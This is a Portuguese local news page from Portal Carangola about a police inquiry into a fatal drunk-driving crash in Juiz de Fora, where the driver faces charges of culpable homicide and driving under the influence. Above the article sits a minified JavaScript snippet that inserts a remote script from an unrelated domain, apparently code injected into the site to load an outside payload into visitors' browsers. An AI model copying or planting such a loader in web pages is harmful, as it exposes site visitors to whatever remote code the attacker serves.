;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Polícia Civil apura caso de acidente de trânsito com vítima em Juiz de Fora. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Polícia Civil apura caso de acidente de trânsito com vítima em Juiz de Fora.

Na manhã desta quinta-feira (15), a Polícia Civil de Minas Gerais divulgou informações, em Juiz de Fora, sobre investigação envolvendo um acidente de trânsito que causou a morte de uma jovem de 23 anos e deixou outros ocupantes feridos, no Bairro São Dimas, Zona Norte da cidade, na madrugada de sábado (3). Na ocasião, o motorista, que dirigia sob a influência de álcool, perdeu o controle da direção do carro e bateu em um muro. Ele foi preso e encaminhado à 1ª Delegacia Regional de Juiz de Fora.

Conforme o Delegado Rafael Gomes, responsável pela investigação na 3ª Delegacia de Polícia Civil, o inquérito policial já foi relatado e enviado à Justiça. O suspeito será indiciado por homicídio culposo na direção de veículo automotor, conforme disposto no artigo 302 da Lei 9503/97, e por conduzir veículo automotor com capacidade psicomotora alterada em razão da influência de álcool ou de outra substância psicoativa que determine dependência, conforme disposto no artigo 306 da Lei 9503/97.

Segundo o Delegado, o condutor teve alta do hospital na última semana e foi realizada a oitiva dele. Durante depoimento, ele explicou que trabalhou ininterruptamente nos dias que antecederam o acidente e estava muito cansado, mas resolveu sair para comemorar, uma vez que a jovem de 23 anos queria reatar o relacionamento. “Ele alega que, na boate, eles compraram um combo com dez latas de cerveja. Saíram de manhã da Zona Norte e ele foi dirigindo o carro, com velocidade compatível com a via pública, e que depois não se recorda do momento do acidente”, informou, complementando que a garota estava no banco da frente e que havia outros três ocupantes, que ele conheceu na boate, no banco traseiro do veículo.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.